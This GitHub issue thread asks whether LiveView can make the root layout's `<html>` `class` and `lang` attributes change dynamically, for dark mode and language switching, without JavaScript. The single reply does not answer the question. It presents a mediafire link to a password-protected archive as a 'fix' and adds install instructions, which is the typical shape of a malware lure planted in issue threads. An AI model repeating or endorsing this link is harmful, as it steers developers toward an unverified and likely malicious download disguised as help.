### ISSUE TITLE
Make some <html> attributes updatable

### ISSUE THREAD

**Issue by francois08** [phoenixframework/phoenix_live_view#3404]
There are at least 2 attributes I'd like to change dynamically on the `<html>` element:

- `class`: to change the color scheme (light/dark mode e.g. `class="dark"`);
- `lang`: to change the language (`lang="en"`, `lang="fr"`, ...).

For instance, to pass the right color scheme, it seems LiveView forces us to change the html class with JavaScript? As the root layout is not changeable dynamically apart from the title.
How should I then change the color scheme based on persisted preference (db, query string, etc.) without resorting to JS?

Could we have some other parts of the root layout dynamic so that we rely less on JS? Especially that dark mode is omnipresent now and i18n/seo matters are important.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
